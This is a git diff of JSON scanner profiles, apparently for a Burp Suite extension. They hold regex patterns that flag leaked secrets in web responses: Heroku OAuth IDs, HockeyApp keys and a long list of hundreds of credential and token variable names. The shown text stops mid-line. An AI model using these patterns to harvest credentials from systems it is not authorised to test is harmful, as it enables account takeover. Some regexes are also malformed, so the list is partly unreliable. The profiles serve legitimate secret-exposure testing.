+ "Enabled": true,
+ "Scanner": 2,
+ "Author": "@six2dez1",
+ "Payloads": [],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,^(0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12})",
+ "true,Or,[^a-zA-Z0-9](0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12})"
+ ],
+ "Tags": [
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": true,
+ "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2",
+ "HttpResponseCode": "",
+ "NegativeCT": true,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 2,
+ "Scope": 2,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 0,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "Heroku OAuth 2.0",
+ "IssueSeverity": "Information",
+ "IssueConfidence": "Certain",
+ "IssueDetail": "",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/HockeyApp_Key.bb b/profiles/HockeyApp_Key.bb
old mode 100644
new mode 100755
index 897824d..e1a7331
--- a/profiles/HockeyApp_Key.bb
+++ b/profiles/HockeyApp_Key.bb
@@ -1 +1,59 @@
-[{"Name":"HockeyApp_Key","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,(?i)hockey.{0,50}(\\\\\\\"|\u0027|`)?[0-9a-f]{32}(\\\\\\\"|\u0027|`)?"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"HockeyApp Key","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "HockeyApp_Key",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 2,
+ "Author": "@six2dez1",
+ "Payloads": [],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,(?i)hockey.{0,50}(\\\\\\\"|\u0027|`)?[0-9a-f]{32}(\\\\\\\"|\u0027|`)?"
+ ],
+ "Tags": [
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": true,
+ "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2",
+ "HttpResponseCode": "",
+ "NegativeCT": true,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 2,
+ "Scope": 2,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 0,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "HockeyApp Key",
+ "IssueSeverity": "Information",
+ "IssueConfidence": "Certain",
+ "IssueDetail": "",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/Interesting_Keyworks.bb b/profiles/Interesting_Keyworks.bb
old mode 100644
new mode 100755
index be812ea..7035d4e
--- a/profiles/Interesting_Keyworks.bb
+++ b/profiles/Interesting_Keyworks.bb
@@ -1 +1,707 @@
-[{"Name":"Interesting_Keyworks","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,adzerk[_-]api[_-]key","true,Or,algolia[_-]admin[_-]key[_-]1","true,Or,algolia[_-]admin[_-]key[_-]2","true,Or,algolia[_-]admin[_-]key[_-]mcm","true,Or,algolia[_-]api[_-]key","true,Or,algolia[_-]api[_-]key[_-]mcm","true,Or,algolia[_-]api[_-]key[_-]search","true,Or,algolia[_-]search[_-]api[_-]key","true,Or,algolia[_-]search[_-]key","true,Or,algolia[_-]search[_-]key[_-]1","true,Or,alicloud[_-]access[_-]key","true,Or,alicloud[_-]secret[_-]key","true,Or,amazon[_-]bucket[_-]name","true,Or,amazon[_-]secret[_-]access[_-]key","true,Or,anaconda[_-]token","true,Or,android[_-]docs[_-]deploy[_-]token","true,Or,ansible[_-]vault[_-]password","true,Or,apiary[_-]api[_-]key","true,Or,apigw[_-]access[_-]token","true,Or,app[_-]bucket[_-]perm","true,Or,app[_-]report[_-]token[_-]key","true,Or,apple[_-]id[_-]password","true,Or,argos[_-]token","true,Or,artifactory[_-]key","true,Or,artifacts[_-]aws[_-]access[_-]key[_-]id","true,Or,artifacts[_-]aws[_-]secret[_-]access[_-]key","true,Or,artifacts[_-]bucket","true,Or,artifacts[_-]key","true,Or,artifacts[_-]secret","true,Or,assistant[_-]iam[_-]apikey","true,Or,auth0[_-]api[_-]clientsecret","true,Or,auth0[_-]client[_-]secret","true,Or,author[_-]email[_-]addr","true,Or,author[_-]npm[_-]api[_-]key","true,Or,aws[_-]access[_-]key","true,Or,aws[_-]access[_-]key[_-]id","true,Or,aws[_-]config[_-]accesskeyid","true,Or,aws[_-]config[_-]secretaccesskey","true,Or,aws[_-]secret[_-]access[_-]key","true,Or,aws[_-]secret[_-]key","true,Or,aws[_-]ses[_-]access[_-]key[_-]id","true,Or,aws[_-]ses[_-]secret[_-]access[_-]key","true,Or,awscn[_-]access[_-]key[_-]id","true,Or,awscn[_-]secret[_-]access[_-]key","true,Or,b2[_-]app[_-]key","true,Or,b2[_-]bucket","true,Or,bintray[_-]api[_-]key","true,Or,bintray[_-]apikey","true,Or,bintray[_-]gpg[_-]password","true,Or,bintray[_-]key","true,Or,bintray[_-]token","true,Or,bluemix[_-]api[_-]key","true,Or,bluemix[_-]auth","true,Or,bluemix[_-]pass","true,Or,bluemix[_-]pass[_-]prod","true,Or,bluemix[_-]password","true,Or,bluemix[_-]pwd","true,Or,bluemix[_-]username","true,Or,brackets[_-]repo[_-]oauth[_-]token","true,Or,browser[_-]stack[_-]access[_-]key","true,Or,browserstack[_-]access[_-]key","true,Or,bucketeer[_-]aws[_-]access[_-]key[_-]id","true,Or,bucketeer[_-]aws[_-]secret[_-]access[_-]key","true,Or,built[_-]branch[_-]deploy[_-]key","true,Or,bundlesize[_-]github[_-]token","true,Or,bx[_-]password","true,Or,bx[_-]username","true,Or,cache[_-]s3[_-]secret[_-]key","true,Or,cargo[_-]token","true,Or,cattle[_-]access[_-]key","true,Or,cattle[_-]agent[_-]instance[_-]auth","true,Or,cattle[_-]secret[_-]key","true,Or,censys[_-]secret","true,Or,certificate[_-]password","true,Or,cf[_-]password","true,Or,cheverny[_-]token","true,Or,chrome[_-]client[_-]secret","true,Or,chrome[_-]refresh[_-]token","true,Or,ci[_-]deploy[_-]password","true,Or,ci[_-]project[_-]url","true,Or,ci[_-]registry[_-]user","true,Or,ci[_-]server[_-]name","true,Or,ci[_-]user[_-]token","true,Or,claimr[_-]database","true,Or,claimr[_-]db","true,Or,claimr[_-]superuser","true,Or,claimr[_-]token","true,Or,cli[_-]e2e[_-]cma[_-]token","true,Or,client[_-]secret","true,Or,clojars[_-]password","true,Or,cloud[_-]api[_-]key","true,Or,cloudant[_-]archived[_-]database","true,Or,cloudant[_-]audited[_-]database","true,Or,cloudant[_-]database","true,Or,cloudant[_-]instance","true,Or,cloudant[_-]order[_-]database","true,Or,cloudant[_-]parsed[_-]database","true,Or,cloudant[_-]password","true,Or,cloudant[_-]processed[_-]database","true,Or,cloudant[_-]service[_-]database","true,Or,cloudflare[_-]api[_-]key","true,Or,cloudflare[_-]auth[_-]email","true,Or,cloudflare[_-]auth[_-]key","true,Or,cloudflare[_-]email","true,Or,cloudinary[_-]url","true,Or,cloudinary[_-]url[_-]staging","true,Or,clu[_-]repo[_-]url","true,Or,clu[_-]ssh[_-]private[_-]key[_-]base64","true,Or,cn[_-]access[_-]key[_-]id","true,Or,cn[_-]secret[_-]access[_-]key","true,Or,cocoapods[_-]trunk[_-]email","true,Or,cocoapods[_-]trunk[_-]token","true,Or,codacy[_-]project[_-]token","true,Or,codeclimate[_-]repo[_-]token","true,Or,codecov[_-]token","true,Or,coding[_-]token","true,Or,conekta[_-]apikey","true,Or,contentful[_-]access[_-]token","true,Or,contentful[_-]cma[_-]test[_-]token","true,Or,contentful[_-]integration[_-]management[_-]token","true,Or,contentful[_-]management[_-]api[_-]access[_-]token","true,Or,contentful[_-]management[_-]api[_-]access[_-]token[_-]new","true,Or,contentful[_-]php[_-]management[_-]test[_-]token","true,Or,contentful[_-]test[_-]org[_-]cma[_-]token","true,Or,contentful[_-]v2[_-]access[_-]token","true,Or,conversation[_-]password","true,Or,conversation[_-]username","true,Or,cos[_-]secrets","true,Or,coveralls[_-]api[_-]token","true,Or,coveralls[_-]repo[_-]token","true,Or,coveralls[_-]token","true,Or,coverity[_-]scan[_-]token","true,Or,cypress[_-]record[_-]key","true,Or,danger[_-]github[_-]api[_-]token","true,Or,database[_-]host","true,Or,database[_-]name","true,Or,database[_-]password","true,Or,database[_-]port","true,Or,database[_-]user","true,Or,database[_-]username","true,Or,datadog[_-]api[_-]key","true,Or,datadog[_-]app[_-]key","true,Or,db[_-]connection","true,Or,db[_-]database","true,Or,db[_-]host","true,Or,db[_-]password","true,Or,db[_-]pw","true,Or,db[_-]user","true,Or,db[_-]username","true,Or,ddg[_-]test[_-]email","true,Or,ddg[_-]test[_-]email[_-]pw","true,Or,ddgc[_-]github[_-]token","true,Or,deploy[_-]password","true,Or,deploy[_-]secure","true,Or,deploy[_-]token","true,Or,deploy[_-]user","true,Or,dgpg[_-]passphrase","true,Or,digitalocean[_-]access[_-]token","true,Or,digitalocean[_-]ssh[_-]key[_-]body","true,Or,digitalocean[_-]ssh[_-]key[_-]ids","true,Or,docker[_-]hub[_-]password","true,Or,docker[_-]key","true,Or,docker[_-]pass","true,Or,docker[_-]passwd","true,Or,docker[_-]password","true,Or,docker[_-]postgres[_-]url","true,Or,docker[_-]token","true,Or,dockerhub[_-]password","true,Or,dockerhubpassword","true,Or,doordash[_-]auth[_-]token","true,Or,dropbox[_-]oauth[_-]bearer","true,Or,droplet[_-]travis[_-]password","true,Or,dsonar[_-]login","true,Or,dsonar[_-]projectkey","true,Or,elastic[_-]cloud[_-]auth","true,Or,elasticsearch[_-]password","true,Or,encryption[_-]password","true,Or,end[_-]user[_-]password","true,Or,env[_-]github[_-]oauth[_-]token","true,Or,env[_-]heroku[_-]api[_-]key","true,Or,env[_-]key","true,Or,env[_-]secret","true,Or,env[_-]secret[_-]access[_-]key","true,Or,env[_-]sonatype[_-]password","true,Or,eureka[_-]awssecretkey","true,Or,exp[_-]password","true,Or,file[_-]password","true,Or,firebase[_-]api[_-]json","true,Or,firebase[_-]api[_-]token","true,Or,firebase[_-]key","true,Or,firebase[_-]project[_-]develop","true,Or,firebase[_-]token","true,Or,firefox[_-]secret","true,Or,flask[_-]secret[_-]key","true,Or,flickr[_-]api[_-]key","true,Or,flickr[_-]api[_-]secret","true,Or,fossa[_-]api[_-]key","true,Or,ftp[_-]host","true,Or,ftp[_-]login","true,Or,ftp[_-]password","true,Or,ftp[_-]pw","true,Or,ftp[_-]user","true,Or,ftp[_-]username","true,Or,gcloud[_-]bucket","true,Or,gcloud[_-]project","true,Or,gcloud[_-]service[_-]key","true,Or,gcr[_-]password","true,Or,gcs[_-]bucket","true,Or,gh[_-]api[_-]key","true,Or,gh[_-]email","true,Or,gh[_-]next[_-]oauth[_-]client[_-]secret","true,Or,gh[_-]next[_-]unstable[_-]oauth[_-]client[_-]id","true,Or,gh[_-]next[_-]unstable[_-]oauth[_-]client[_-]secret","true,Or,gh[_-]oauth[_-]client[_-]secret","true,Or,gh[_-]oauth[_-]token","true,Or,gh[_-]repo[_-]token","true,Or,gh[_-]token","true,Or,gh[_-]unstable[_-]oauth[_-]client[_-]secret","true,Or,ghb[_-]token","true,Or,ghost[_-]api[_-]key","true,Or,git[_-]author[_-]email","true,Or,git[_-]author[_-]name","true,Or,git[_-]committer[_-]email","true,Or,git[_-]committer[_-]name","true,Or,git[_-]email","true,Or,git[_-]name","true,Or,git[_-]token","true,Or,github[_-]access[_-]token","true,Or,github[_-]api[_-]key","true,Or,github[_-]api[_-]token","true,Or,github[_-]auth","true,Or,github[_-]auth[_-]token","true,Or,github[_-]client[_-]secret","true,Or,github[_-]deploy[_-]hb[_-]doc[_-]pass","true,Or,github[_-]deployment[_-]token","true,Or,github[_-]hunter[_-]token","true,Or,github[_-]hunter[_-]username","true,Or,github[_-]oauth","true,Or,github[_-]oauth[_-]token","true,Or,github[_-]password","true,Or,github[_-]pwd","true,Or,github[_-]release[_-]token","true,Or,github[_-]repo","true,Or,github[_-]token","true,Or,github[_-]tokens","true,Or,gitlab[_-]user[_-]email","true,Or,gogs[_-]password","true,Or,google[_-]account[_-]type","true,Or,google[_-]client[_-]email","true,Or,google[_-]client[_-]id","true,Or,google[_-]client[_-]secret","true,Or,google[_-]maps[_-]api[_-]key","true,Or,google[_-]private[_-]key","true,Or,gpg[_-]key[_-]name","true,Or,gpg[_-]keyname","true,Or,gpg[_-]ownertrust","true,Or,gpg[_-]passphrase","true,Or,gpg[_-]private[_-]key","true,Or,gpg[_-]secret[_-]keys","true,Or,gradle[_-]publish[_-]key","true,Or,gradle[_-]publish[_-]secret","true,Or,gradle[_-]signing[_-]key[_-]id","true,Or,gradle[_-]signing[_-]password","true,Or,gren[_-]github[_-]token","true,Or,grgit[_-]user","true,Or,hab[_-]auth[_-]token","true,Or,hab[_-]key","true,Or,hb[_-]codesign[_-]gpg[_-]pass","true,Or,hb[_-]codesign[_-]key[_-]pass","true,Or,heroku[_-]api[_-]key","true,Or,heroku[_-]email","true,Or,heroku[_-]token","true,Or,hockeyapp[_-]token","true,Or,homebrew[_-]github[_-]api[_-]token","true,Or,hub[_-]dxia2[_-]password","true,Or,ij[_-]repo[_-]password","true,Or,ij[_-]repo[_-]username","true,Or,index[_-]name","true,Or,integration[_-]test[_-]api[_-]key","true,Or,integration[_-]test[_-]appid","true,Or,internal[_-]secrets","true,Or,ios[_-]docs[_-]deploy[_-]token","true,Or,itest[_-]gh[_-]token","true,Or,jdbc[_-]databaseurl","true,Or,jdbc[_-]host","true,Or,jwt[_-]secret","true,Or,kafka[_-]admin[_-]url","true,Or,kafka[_-]instance[_-]name","true,Or,kafka[_-]rest[_-]url","true,Or,keystore[_-]pass","true,Or,kovan[_-]private[_-]key","true,Or,kubecfg[_-]s3[_-]path","true,Or,kxoltsn3vogdop92m","true,Or,leanplum[_-]key","true,Or,lektor[_-]deploy[_-]password","true,Or,lektor[_-]deploy[_-]username","true,Or,lighthouse[_-]api[_-]key","true,Or,linkedin[_-]client[_-]secretor lottie[_-]s3[_-]api[_-]key","true,Or,linux[_-]signing[_-]key","true,Or,ll[_-]publish[_-]url","true,Or,ll[_-]shared[_-]key","true,Or,looker[_-]test[_-]runner[_-]client[_-]secret","true,Or,lottie[_-]happo[_-]api[_-]key","true,Or,lottie[_-]happo[_-]secret[_-]key","true,Or,lottie[_-]s3[_-]secret[_-]key","true,Or,lottie[_-]upload[_-]cert[_-]key[_-]password","true,Or,lottie[_-]upload[_-]cert[_-]key[_-]store[_-]password","true,Or,magento[_-]auth[_-]password","true,Or,magento[_-]auth[_-]username ","true,Or,magento[_-]password","true,Or,mail[_-]password","true,Or,mailchimp[_-]api[_-]key","true,Or,mailchimp[_-]key","true,Or,mailer[_-]password","true,Or,mailgun[_-]api[_-]key","true,Or,mailgun[_-]apikey","true,Or,mailgun[_-]password","true,Or,mailgun[_-]priv[_-]key","true,Or,mailgun[_-]pub[_-]apikey","true,Or,mailgun[_-]pub[_-]key","true,Or,mailgun[_-]secret[_-]api[_-]key","true,Or,manage[_-]key","true,Or,manage[_-]secret","true,Or,management[_-]token","true,Or,managementapiaccesstoken","true,Or,mandrill[_-]api[_-]key","true,Or,manifest[_-]app[_-]token","true,Or,manifest[_-]app[_-]url","true,Or,mapbox[_-]access[_-]token","true,Or,mapbox[_-]api[_-]token","true,Or,mapbox[_-]aws[_-]access[_-]key[_-]id","true,Or,mapbox[_-]aws[_-]secret[_-]access[_-]key","true,Or,mapboxaccesstoken","true,Or,mg[_-]api[_-]key","true,Or,mg[_-]public[_-]api[_-]key","true,Or,mh[_-]apikey","true,Or,mh[_-]password","true,Or,mile[_-]zero[_-]key","true,Or,minio[_-]access[_-]key","true,Or,minio[_-]secret[_-]key","true,Or,multi[_-]bob[_-]sid","true,Or,multi[_-]connect[_-]sid","true,Or,multi[_-]disconnect[_-]sid","true,Or,multi[_-]workflow[_-]sid","true,Or,multi[_-]workspace[_-]sid","true,Or,my[_-]secret[_-]env","true,Or,mysql[_-]database","true,Or,mysql[_-]hostname","true,Or,mysql[_-]password","true,Or,mysql[_-]root[_-]password","true,Or,mysql[_-]user","true,Or,mysql[_-]username","true,Or,mysqlmasteruser","true,Or,mysqlsecret","true,Or,netlify[_-]api[_-]key","true,Or,new[_-]relic[_-]beta[_-]token","true,Or,nexus[_-]password","true,Or,nexuspassword","true,Or,ngrok[_-]auth[_-]token","true,Or,ngrok[_-]token","true,Or,node[_-]env","true,Or,node[_-]pre[_-]gyp[_-]accesskeyid","true,Or,node[_-]pre[_-]gyp[_-]github[_-]token","true,Or,node[_-]pre[_-]gyp[_-]secretaccesskey","true,Or,non[_-]token","true,Or,now[_-]token","true,Or,npm[_-]api[_-]key","true,Or,npm[_-]api[_-]token","true,Or,npm[_-]auth[_-]token","true,Or,npm[_-]email","true,Or,npm[_-]password","true,Or,npm[_-]secret[_-]key","true,Or,npm[_-]token","true,Or,nuget[_-]api[_-]key","true,Or,nuget[_-]apikey","true,Or,nuget[_-]key","true,Or,numbers[_-]service[_-]pass","true,Or,oauth[_-]token","true,Or,object[_-]storage[_-]password","true,Or,object[_-]storage[_-]region[_-]name","true,Or,object[_-]store[_-]bucket","true,Or,object[_-]store[_-]creds","true,Or,oc[_-]pass","true,Or,octest[_-]app[_-]password","true,Or,octest[_-]app[_-]username","true,Or,octest[_-]password","true,Or,ofta[_-]key","true,Or,ofta[_-]region","true,Or,ofta[_-]secret","true,Or,okta[_-]client[_-]token","true,Or,okta[_-]oauth2[_-]client[_-]secret","true,Or,okta[_-]oauth2[_-]clientsecret","true,Or,omise[_-]key","true,Or,omise[_-]pkey","true,Or,omise[_-]pubkey","true,Or,omise[_-]skey","true,Or,onesignal[_-]api[_-]key","true,Or,onesignal[_-]user[_-]auth[_-]key","true,Or,open[_-]whisk[_-]key","true,Or,openwhisk[_-]key","true,Or,org[_-]gradle[_-]project[_-]sonatype[_-]nexus[_-]password","true,Or,org[_-]project[_-]gradle[_-]sonatype[_-]nexus[_-]password","true,Or,os[_-]auth[_-]url","true,Or,os[_-]password","true,Or,ossrh[_-]jira[_-]password","true,Or,ossrh[_-]pass","true,Or,ossrh[_-]password","true,Or,ossrh[_-]secret","true,Or,ossrh[_-]username","true,Or,packagecloud[_-]token","true,Or,pagerduty[_-]apikey","true,Or,parse[_-]js[_-]key","true,Or,passwordtravis","true,Or,paypal[_-]client[_-]secret","true,Or,percy[_-]project","true,Or,percy[_-]token","true,Or,personal[_-]key","true,Or,personal[_-]secret","true,Or,pg[_-]database","true,Or,pg[_-]host","true,Or,places[_-]api[_-]key","true,Or,places[_-]apikey","true,Or,plotly[_-]apikey","true,Or,plugin[_-]password","true,Or,postgres[_-]env[_-]postgres[_-]db","true,Or,postgres[_-]env[_-]postgres[_-]password","true,Or,postgresql[_-]db","true,Or,postgresql[_-]pass","true,Or,prebuild[_-]auth","true,Or,preferred[_-]username","true,Or,pring[_-]mail[_-]username","true,Or,private[_-]signing[_-]password","true,Or,prod[_-]access[_-]key[_-]id","true,Or,prod[_-]password","true,Or,prod[_-]secret[_-]key","true,Or,project[_-]config","true,Or,publish[_-]access","true,Or,publish[_-]key","true,Or,publish[_-]secret","true,Or,pushover[_-]token","true,Or,pypi[_-]passowrd","true,Or,qiita[_-]token","true,Or,quip[_-]token","true,Or,rabbitmq[_-]password","true,Or,randrmusicapiaccesstoken","true,Or,redis[_-]stunnel[_-]urls","true,Or,rediscloud[_-]url","true,Or,refresh[_-]token","true,Or,registry[_-]pass","true,Or,registry[_-]secure","true,Or,release[_-]gh[_-]token","true,Or,release[_-]token","true,Or,reporting[_-]webdav[_-]pwd","true,Or,reporting[_-]webdav[_-]url","true,Or,repotoken","true,Or,rest[_-]api[_-]key","true,Or,rinkeby[_-]private[_-]key","true,Or,ropsten[_-]private[_-]key","true,Or,route53[_-]access[_-]key[_-]id","true,Or,rtd[_-]key[_-]pass","true,Or,rtd[_-]store[_-]pass","true,Or,rubygems[_-]auth[_-]token","true,Or,s3[_-]access[_-]key","true,Or,s3[_-]access[_-]key[_-]id","true,Or,s3[_-]bucket[_-]name[_-]app[_-]logs","true,Or,s3[_-]bucket[_-]name[_-]assets","true,Or,s3[_-]external[_-]3[_-]amazonaws[_-]com","true,Or,s3[_-]key","true,Or,s3[_-]key[_-]app[_-]logs","true,Or,s3[_-]key[_-]assets","true,Or,s3[_-]secret[_-]app[_-]logs","true,Or,s3[_-]secret[_-]assets","true,Or,s3[_-]secret[_-]key","true,Or,s3[_-]user[_-]secret","true,Or,sacloud[_-]access[_-]token","true,Or,sacloud[_-]access[_-]token[_-]secret","true,Or,sacloud[_-]api","true,Or,salesforce[_-]bulk[_-]test[_-]password","true,Or,salesforce[_-]bulk[_-]test[_-]security[_-]token","true,Or,sandbox[_-]access[_-]token","true,Or,sandbox[_-]aws[_-]access[_-]key[_-]id","true,Or,sandbox[_-]aws[_-]secret[_-]access[_-]key","true,Or,sauce[_-]access[_-]key","true,Or,scrutinizer[_-]token","true,Or,sdr[_-]token","true,Or,secret[_-]0","true,Or,secret[_-]1","true,Or,secret[_-]10","true,Or,secret[_-]11","true,Or,secret[_-]2","true,Or,secret[_-]3","true,Or,secret[_-]4","true,Or,secret[_-]5","true,Or,secret[_-]6","true,Or,secret[_-]7","true,Or,secret[_-]8","true,Or,secret[_-]9","true,Or,secret[_-]key[_-]base","true,Or,segment[_-]api[_-]key","true,Or,selion[_-]log[_-]level[_-]dev","true,Or,selion[_-]selenium[_-]host","true,Or,sendgrid[_-]api[_-]key","true,Or,sendgrid[_-]key","true,Or,sendgrid[_-]password","true,Or,sendgrid[_-]user","true,Or,sendgrid[_-]username","true,Or,sendwithus[_-]key","true,Or,sentry[_-]auth[_-]token","true,Or,sentry[_-]default[_-]org","true,Or,sentry[_-]endpoint","true,Or,sentry[_-]key","true,Or,service[_-]account[_-]secret","true,Or,ses[_-]access[_-]key","true,Or,ses[_-]secret[_-]key","true,Or,signing[_-]key","true,Or,signing[_-]key[_-]password","true,Or,signing[_-]key[_-]secret","true,Or,signing[_-]key[_-]sid","true,Or,slash[_-]developer[_-]space","true,Or,slash[_-]developer[_-]space[_-]key","true,Or,slate[_-]user[_-]email","true,Or,snoowrap[_-]client[_-]secret","true,Or,snoowrap[_-]password","true,Or,snoowrap[_-]refresh[_-]token","true,Or,snyk[_-]api[_-]token","true,Or,snyk[_-]token","true,Or,socrata[_-]app[_-]token","true,Or,socrata[_-]password","true,Or,sonar[_-]organization[_-]key","true,Or,sonar[_-]project[_-]key","true,Or,sonar[_-]token","true,Or,sonatype[_-]gpg[_-]key[_-]name","true,Or,sonatype[_-]gpg[_-]passphrase","true,Or,sonatype[_-]nexus[_-]password","true,Or,sonatype[_-]pass","true,Or,sonatype[_-]password","true,Or,sonatype[_-]token[_-]password","true,Or,sonatype[_-]token[_-]user","true,Or,sonatypepassword","true,Or,soundcloud[_-]client[_-]secret","true,Or,soundcloud[_-]password","true,Or,spaces[_-]access[_-]key[_-]id","true,Or,spaces[_-]secret[_-]access[_-]key","true,Or,spotify[_-]api[_-]access[_-]token","true,Or,spotify[_-]api[_-]client[_-]secret","true,Or,spring[_-]mail[_-]password","true,Or,sqsaccesskey","true,Or,sqssecretkey","true,Or,square[_-]reader[_-]sdk[_-]repository[_-]password","true,Or,srcclr[_-]api[_-]token","true,Or,ssmtp[_-]config","true,Or,staging[_-]base[_-]url[_-]runscope","true,Or,star[_-]test[_-]aws[_-]access[_-]key[_-]id","true,Or,star[_-]test[_-]bucket","true,Or,star[_-]test[_-]location","true,Or,star[_-]test[_-]secret[_-]access[_-]key","true,Or,starship[_-]account[_-]sid","true,Or,starship[_-]auth[_-]token","true,Or,stormpath[_-]api[_-]key[_-]id","true,Or,stormpath[_-]api[_-]key[_-]secret","true,Or,strip[_-]publishable[_-]key","true,Or,strip[_-]secret[_-]key","true,Or,stripe[_-]private","true,Or,stripe[_-]public","true,Or,surge[_-]login","true,Or,surge[_-]token","true,Or,svn[_-]pass","true,Or,tesco[_-]api[_-]key","true,Or,test[_-]github[_-]token","true,Or,test[_-]test","true,Or,tester[_-]keys[_-]password","true,Or,thera[_-]oss[_-]access[_-]key","true,Or,token[_-]core[_-]java","true,Or,travis[_-]access[_-]token","true,Or,travis[_-]api[_-]token","true,Or,travis[_-]branch","true,Or,travis[_-]com[_-]token","true,Or,travis[_-]e2e[_-]token","true,Or,travis[_-]gh[_-]token","true,Or,travis[_-]pull[_-]request","true,Or,travis[_-]secure[_-]env[_-]vars","true,Or,travis[_-]token","true,Or,trex[_-]client[_-]token","true,Or,trex[_-]okta[_-]client[_-]token","true,Or,twilio[_-]api[_-]key","true,Or,twilio[_-]api[_-]secret","true,Or,twilio[_-]chat[_-]account[_-]api[_-]service","true,Or,twilio[_-]configuration[_-]sid","true,Or,twilio[_-]sid","true,Or,twilio[_-]token","true,Or,twine[_-]password","true,Or,twitter[_-]consumer[_-]key","true,Or,twitter[_-]consumer[_-]secret","true,Or,twitteroauthaccesssecret","true,Or,twitteroauthaccesstoken","true,Or,unity[_-]password","true,Or,unity[_-]serial","true,Or,urban[_-]key","true,Or,urban[_-]master[_-]secret","true,Or,urban[_-]secret","true,Or,us[_-]east[_-]1[_-]elb[_-]amazonaws[_-]com","true,Or,use[_-]ssh","true,Or,user[_-]assets[_-]access[_-]key[_-]id","true,Or,user[_-]assets[_-]secret[_-]access[_-]key","true,Or,v[_-]sfdc[_-]client[_-]secret","true,Or,v[_-]sfdc[_-]password","true,Or,vip[_-]github[_-]build[_-]repo[_-]deploy[_-]key","true,Or,vip[_-]github[_-]deploy[_-]key","true,Or,vip[_-]github[_-]deploy[_-]key[_-]pass","true,Or,virustotal[_-]apikey","true,Or,visual[_-]recognition[_-]api[_-]key","true,Or,wakatime[_-]api[_-]key","true,Or,watson[_-]conversation[_-]password","true,Or,watson[_-]device[_-]password","true,Or,watson[_-]password","true,Or,widget[_-]basic[_-]password","true,Or,widget[_-]basic[_-]password[_-]2","true,Or,widget[_-]basic[_-]password[_-]3","true,Or,widget[_-]basic[_-]password[_-]4","true,Or,widget[_-]basic[_-]password[_-]5","true,Or,widget[_-]fb[_-]password","true,Or,widget[_-]fb[_-]password[_-]2","true,Or,widget[_-]fb[_-]password[_-]3","true,Or,widget[_-]test[_-]server","true,Or,wincert[_-]password","true,Or,wordpress[_-]db[_-]password","true,Or,wordpress[_-]db[_-]user","true,Or,wpjm[_-]phpunit[_-]google[_-]geocode[_-]api[_-]key","true,Or,wporg[_-]password","true,Or,wpt[_-]db[_-]password","true,Or,wpt[_-]db[_-]user","true,Or,wpt[_-]prepare[_-]dir","true,Or,wpt[_-]report[_-]api[_-]key","true,Or,wpt[_-]ssh[_-]connect","true,Or,wpt[_-]ssh[_-]private[_-]key[_-]base64","true,Or,www[_-]googleapis[_-]com","true,Or,yangshun[_-]gh[_-]password","true,Or,yangshun[_-]gh[_-]token","true,Or,yt[_-]account[_-]client[_-]secret","true,Or,yt[_-]account[_-]refresh[_-]token","true,Or,yt[_-]api[_-]key","true,Or,yt[_-]client[_-]secret","true,Or,yt[_-]partner[_-]client[_-]secret","true,Or,yt[_-]partner[_-]refresh[_-]token","true,Or,yt[_-]server[_-]api[_-]key","true,Or,zendesk[_-]travis[_-]github","true,Or,zensonatypepassword","true,Or,zhuliang[_-]gh[_-]token","true,Or,zopim[_-]account[_-]key"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":f